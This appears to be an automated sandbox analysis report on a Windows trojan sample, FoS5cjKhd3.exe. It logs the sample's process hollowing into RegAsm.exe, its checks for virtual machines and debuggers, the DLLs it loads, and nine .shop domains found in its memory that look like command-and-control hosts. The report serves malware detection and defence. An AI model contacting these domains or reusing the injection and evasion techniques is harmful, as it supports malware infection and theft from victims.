            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041E71A3_2_0041E71A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0044B7203_2_0044B720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004087F03_2_004087F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004288333_2_00428833
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004338C03_2_004338C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004408E63_2_004408E6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004038A03_2_004038A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004349903_2_00434990
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040ABA03_2_0040ABA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042EBBC3_2_0042EBBC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00437CD03_2_00437CD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00449D223_2_00449D22
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00407E503_2_00407E50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00427E6C3_2_00427E6C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00437F303_2_00437F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042DFE03_2_0042DFE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0041D1E0 appears 164 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0040CC80 appears 44 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 1768
            Source: FoS5cjKhd3.exe, 00000001.00000000.2195601280.00000000009DE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVQP.exeD vs FoS5cjKhd3.exe
            Source: FoS5cjKhd3.exe, 00000001.00000002.2203682529.0000000000E0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs FoS5cjKhd3.exe
            Source: FoS5cjKhd3.exeBinary or memory string: OriginalFilenameVQP.exeD vs FoS5cjKhd3.exe
            Source: FoS5cjKhd3.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: FoS5cjKhd3.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.troj.evad.winEXE@6/7@2/1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004402A0 CoCreateInstance,3_2_004402A0
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FoS5cjKhd3.exe.logJump to behavior
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:120:WilError_03
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5344
            Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\481a45e4-981a-4a51-a7d5-0e297a759c60Jump to behavior
            Source: FoS5cjKhd3.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: FoS5cjKhd3.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: FoS5cjKhd3.exeReversingLabs: Detection: 60%
            Source: unknownProcess created: C:\Users\user\Desktop\FoS5cjKhd3.exe "C:\Users\user\Desktop\FoS5cjKhd3.exe"
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 1768
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 1772
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: FoS5cjKhd3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: FoS5cjKhd3.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: FoS5cjKhd3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: c:\rje\tg\ev8pv\obj\Release\ojc.pdb source: FoS5cjKhd3.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00438B7E push cs; iretd 3_2_00438B85
            Source: FoS5cjKhd3.exeStatic PE information: section name: .text entropy: 7.995414657968518
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeMemory allocated: 2B20000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeMemory allocated: 2CD0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeMemory allocated: 4CD0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exe TID: 6260Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5068Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: Amcache.hve.7.drBinary or memory string: VMware
            Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
            Source: RegAsm.exe, 00000003.00000002.2264764815.0000000000E0F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW:q
            Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
            Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
            Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.7.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
            Source: RegAsm.exe, 00000003.00000002.2264764815.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2264764815.0000000000E0F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.7.drBinary or memory string: vmci.sys
            Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
            Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
            Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.7.drBinary or memory string: VMware20,1
            Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
            Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_3-19225
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004476D0 LdrInitializeThunk,3_2_004476D0
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: FoS5cjKhd3.exe, Program.csReference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
            Source: FoS5cjKhd3.exe, Program.csReference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
            Source: FoS5cjKhd3.exe, Program.csReference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeCode function: 1_2_02CD2151 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,1_2_02CD2151
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: FoS5cjKhd3.exe, 00000001.00000002.2205251595.0000000003CD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: reinforcenh.shop
            Source: FoS5cjKhd3.exe, 00000001.00000002.2205251595.0000000003CD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: stogeneratmns.shop
            Source: FoS5cjKhd3.exe, 00000001.00000002.2205251595.0000000003CD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: fragnantbui.shop
            Source: FoS5cjKhd3.exe, 00000001.00000002.2205251595.0000000003CD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: drawzhotdog.shop
            Source: FoS5cjKhd3.exe, 00000001.00000002.2205251595.0000000003CD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: vozmeatillu.shop
            Source: FoS5cjKhd3.exe, 00000001.00000002.2205251595.0000000003CD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: offensivedzvju.shop
            Source: FoS5cjKhd3.exe, 00000001.00000002.2205251595.0000000003CD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ghostreedmnu.shop
            Source: FoS5cjKhd3.exe, 00000001.00000002.2205251595.0000000003CD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: gutterydhowi.shop
            Source: FoS5cjKhd3.exe, 00000001.00000002.2205251595.0000000003CD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: lootebarrkeyn.shop
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44D000Jump to behavior
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000Jump to behavior
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 460000Jump to behavior
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 876008Jump to behavior
            Source: C:\Users\user\Desktop\FoS5cjKhd3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
